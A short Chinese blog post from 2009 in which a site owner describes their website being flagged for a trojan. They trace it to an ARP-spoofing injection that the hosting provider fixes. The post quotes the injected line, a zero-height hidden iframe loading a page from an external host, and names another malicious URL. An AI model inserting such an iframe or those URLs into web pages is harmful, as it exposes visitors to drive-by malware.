我最讨厌网站被挂马

本站 2009-08-22

今天,早早起床,7:30分打开电脑,上网,看看自己的这个网站,顺便更新一下。瑞星却开始报警,提示有木马,木马网站“http://ckdkj.cn/x67/Td14.htm”,打开后台,一样的提示。打开任意页面,都是如此,一时间晕了、蒙了,要是能把木马连养马人一起跺巴跺巴吃了,自己第一个冲上去。

打开、登陆主机商的控制面板,看看时间还早,先发个留言给“在线客服”,告诉他们我的网站出了问题,请协助解决。然后ftp登陆到网站,把所有的asp页、报木马的html页下载下来,用Uedit32对比本地和网站文件来查看,结果一切正常。

看来不是源码的问题,检查了网站文件数目也正常,这下我真是晕了——以前也中过一次木马,那次就是在网页源码中查出问题的。上网搜索了有关网站挂马的知识,看了不少,一一尝试,可惜没有什么帮助。

打开网站首页,提示木马,不急于关闭页面,而是鼠标右键,查看源文件,再将这源文件与本地文件打开对比,发现了问题。html页的第一句“DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"”变成了,“iframe src=http://lw5253.2288.org/jj2/1.htm width=111 height=0 border=0>

可再将html页ftp下来,看源码却又一切正常。

正郁闷着,主机商网关留言说好了,在上网看看,的确好了。

问问原因,“您好 是别的服务器ARP影响, 现在已经把那台服务器拔线,不会再出现问题”。

不论怎样好了就行。